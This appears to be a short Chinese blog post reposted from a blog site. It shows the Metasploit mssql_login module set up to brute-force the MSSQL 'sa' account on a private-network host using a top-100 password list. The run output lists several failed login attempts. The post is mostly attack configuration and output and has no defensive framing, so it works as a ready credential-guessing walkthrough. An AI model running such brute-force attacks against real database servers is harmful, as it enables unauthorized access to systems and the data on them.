• MSF爆破MSSQL


    show options:

    msf auxiliary(scanner/mssql/mssql_login) > show options
    
    Module options (auxiliary/scanner/mssql/mssql_login):
    
       Name                 Current Setting                           Required  Description
       ----                 ---------------                           --------  -----------
       BLANK_PASSWORDS      false                                     no        Try blank passwords for all users
       BRUTEFORCE_SPEED     5                                         yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS         false                                     no        Try each user/password couple stored in the current database
       DB_ALL_PASS          false                                     no        Add all passwords in the current database to the list
       DB_ALL_USERS         false                                     no        Add all users in the current database to the list
       PASSWORD                                                       no        A specific password to authenticate with
       PASS_FILE            /home/i3ekr/Desktop/dict/pass-top100.txt  no        File containing passwords, one per line
       RHOSTS               10.40.21.28                               yes       The target address range or CIDR identifier
       RPORT                1433                                      yes       The target port (TCP)
       STOP_ON_SUCCESS      false                                     yes       Stop guessing when a credential works for a host
       TDSENCRYPTION        false                                     yes       Use TLS/SSL for TDS data "Force Encryption"
       THREADS              1                                         yes       The number of concurrent threads
       USERNAME             sa                                        no        A specific username to authenticate as
       USERPASS_FILE                                                  no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS         false                                     no        Try the username as the password for all users
       USER_FILE                                                      no        File containing usernames, one per line
       USE_WINDOWS_AUTHENT  false                                     yes       Use windows authentification (requires DOMAIN option set)
       VERBOSE              true                                      yes       Whether to print output for all attempts
    
    msf auxiliary(scanner/mssql/mssql_login) > run 
    
    [*] 10.40.21.28:1433      - 10.40.21.28:1433 - MSSQL - Starting authentication scanner.
    [!] 10.40.21.28:1433      - No active DB -- Credential data will not be saved!
    [-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATIONsa:123456 (Incorrect: )
    [-] 10.40.21.28:1433      - 10.40.21.28:1433 - LOGIN FAILED: WORKSTATIONsa:npdx123! (Incorrect: )
  • 相关阅读:
    今天做了个小项目
    了解类与对象
    装机时键盘选择失误?教你修改kali Linux键盘到美式。
    一些模塊的用法
    你也是全员模块?
    金额保留2位小数 xx.00
    maven项目统一管理版本
    启动项目报错——找不到或无法加载主类 io.vertx.core.Launcher
    以jar包方式启动
    支付业务接口功能(二)
  • 原文地址:https://www.cnblogs.com/nul1/p/8824263.html
Copyright © 2020-2023  润新知